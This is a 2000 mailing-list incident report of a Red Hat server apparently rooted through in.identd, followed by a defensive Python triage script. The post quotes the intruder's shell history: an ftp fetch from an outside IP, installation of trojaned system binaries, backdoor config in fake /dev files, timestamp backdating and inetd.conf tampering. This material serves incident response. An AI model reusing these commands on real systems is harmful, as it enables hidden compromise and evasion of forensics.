Security Incidents mailing list archives
Rooted through in.identd on Red Hat 6.0
From: del () BABEL COM AU (Del Elson)
Date: Wed, 19 Apr 2000 05:02:13 -0000
Hi,

A client was hacked last week by what looked like a buffer overflow through in.identd. This was on a Red Hat 6.0 box. RH don't have any current security notices or fixes for in.identd on their servers, and I haven't seen other boxes hacked through in.identd recently.

The hacker left the usual trace in /.bash_history, which ran like:

    mkdir /usr/lib/... ; cd /usr/lib/...
    ftp 200.192.58.201 21
    cd /usr/lib/...
    mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz; mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz; mv tcpd.gz? tcpd.gz
    gzip -d *
    chmod +x *
    mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin; mv pt07 /usr/lib/; mv pstree /usr/bin ; /usr/lib/pt07
    echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220 ; echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ; echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220 ; echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221;
    touch -t 199910122110 /dev/cui220
    touch -t 199910122110 /dev/cui221
    touch -t 199910122110 /usr/lib/pt07
    touch -t 199910122110 /usr/sbin/syslogd
    touch -t 199910122110 /usr/sbin/tcpd
    touch -t 199910122110 /bin/ps
    touch -t 199910122110 /bin/netstat
    touch -t 199910122110 /usr/bin/pstree
    cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
    mv /tmp/b /etc/inetd.conf
    killall -HUP inetd

... installing a back door and a partial cover of tracks. The only messages in /var/log/messages around the time were:

    Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201
    Apr 8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
    Apr 8 23:16:05 home identd[12007]: Connection from 200.192.58.201
    Apr 8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21

... the IP address traces back to somewhere in Brazil. Anyone know of any current bug notices, exploits, or patches for in.identd?

Del
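The history Del recovered is a compact description of what a responder has to undo: a dot-named hiding directory, trojaned copies of ps/netstat/syslogd/tcpd/pstree dropped into system paths, backdoor config written to fake files under /dev, every one of them backdated with `touch -t`, and a line filtered out of /etc/inetd.conf. The script below is an added triage example, not code from the poster or from Red Hat: it parses a recovered shell history (the sample is transcribed from the post with line breaks reconstructed) into indicator lists, and separately flags groups of files in unrelated directories that share one exact mtime, which is what a `touch -t` sweep leaves behind and what a genuine package install does not. The `SYSTEM_DIRS` set, the `min_files` threshold and the function names are assumptions of this example.

```python
"""Triage helpers for a recovered root .bash_history like the one in the post.

Added example (not the poster's code). parse_history() pulls the defender-
useful indicators out of an attacker's shell history; timestomp_clusters()
flags identical mtimes across unrelated directories, the residue of a
`touch -t` backdating sweep. SAMPLE_HISTORY is transcribed from the post
with line breaks reconstructed; SYSTEM_DIRS is an assumption of this example.
"""
import os
import shlex
from collections import defaultdict

# Directories where a freshly moved-in binary should be treated as a replacement.
SYSTEM_DIRS = {"/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/lib", "/lib"}

SAMPLE_HISTORY = """\
mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz; mv pt07.gz? pt07.gz
mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz; mv tcpd.gz? tcpd.gz
gzip -d *
chmod +x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin; mv pt07 /usr/lib/; mv pstree /usr/bin ; /usr/lib/pt07
echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220 ; echo "2 bnc" >> /dev/220
echo "4 6667" >> /dev/cui221 ; echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220
touch -t 199910122110 /dev/cui220
touch -t 199910122110 /dev/cui221
touch -t 199910122110 /usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /bin/ps
touch -t 199910122110 /bin/netstat
touch -t 199910122110 /usr/bin/pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf
killall -HUP inetd
"""


def _segments(text):
    """Yield one simple command per item: split on newlines, then on ';'."""
    for line in text.splitlines():
        for seg in line.split(";"):
            seg = seg.strip()
            if seg:
                yield seg


def parse_history(text):
    """Extract indicators from a shell history. Returns a dict of lists."""
    iocs = defaultdict(list)
    for seg in _segments(text):
        try:
            toks = shlex.split(seg)          # handles the quoted echo payloads
        except ValueError:
            continue                         # unbalanced quote: skip the fragment
        if not toks:
            continue
        cmd = toks[0]
        if cmd == "mkdir":
            for p in toks[1:]:
                name = os.path.basename(p.rstrip("/"))
                if name and set(name) <= {"."}:      # "..."-style hiding directory
                    iocs["hidden_dirs"].append(p)
        elif cmd == "mv" and len(toks) == 3:
            src, dst = toks[1], toks[2]
            d = dst.rstrip("/") or "/"
            if d in SYSTEM_DIRS:                     # mv ps /bin  -> /bin/ps
                iocs["replaced_binaries"].append(os.path.join(d, os.path.basename(src)))
            elif os.path.dirname(d) in SYSTEM_DIRS:  # mv x /bin/ps
                iocs["replaced_binaries"].append(d)
        elif cmd == "touch" and "-t" in toks:
            i = toks.index("-t")
            stamp = toks[i + 1]
            for p in toks[i + 2:]:
                iocs["timestomped"].append((p, stamp))
        elif cmd == "echo":
            for i, t in enumerate(toks):             # config appended to fake /dev files
                if t in (">>", ">") and i + 1 < len(toks) and toks[i + 1].startswith("/dev/"):
                    iocs["fake_dev_files"].append(toks[i + 1])
        elif cmd == "ftp" and len(toks) > 1:
            iocs["remote_hosts"].append(toks[1])
        elif cmd == "cat" and "/etc/inetd.conf" in toks and "grep" in toks:
            gi = toks.index("grep")                  # grep -v <pat>: a service line was dropped
            if gi + 2 < len(toks) and toks[gi + 1] == "-v":
                iocs["inetd_filtered"].append(toks[gi + 2])
        elif cmd.startswith("/"):
            iocs["executed"].append(cmd)             # absolute paths run directly
    return {k: list(dict.fromkeys(v)) for k, v in iocs.items()}   # dedupe, keep order


def timestomp_clusters(mtimes, min_files=3):
    """Group (path, mtime) pairs by identical mtime; return clusters that span
    at least two directories. Feed it os.stat() results from a live box or the
    touch -t stamps recovered above."""
    by_stamp = defaultdict(list)
    for path, stamp in mtimes:
        by_stamp[stamp].append(path)
    clusters = {}
    for stamp, paths in by_stamp.items():
        dirs = {os.path.dirname(p) for p in paths}
        if len(paths) >= min_files and len(dirs) >= 2:
            clusters[stamp] = sorted(paths)
    return clusters


if __name__ == "__main__":
    found = parse_history(SAMPLE_HISTORY)
    for key, vals in found.items():
        print(f"{key}: {vals}")
    print("timestomp clusters:", timestomp_clusters(found["timestomped"]))
```

On a Red Hat box the replaced-binary list is the first thing to verify against the package database (`rpm -Vf /bin/ps` and so on), with the caveat that rpm itself and the database it reads are only trustworthy when run from clean media; the timestamp clusters are worth checking on a live system too, since the history may have been trimmed while the mtimes were not.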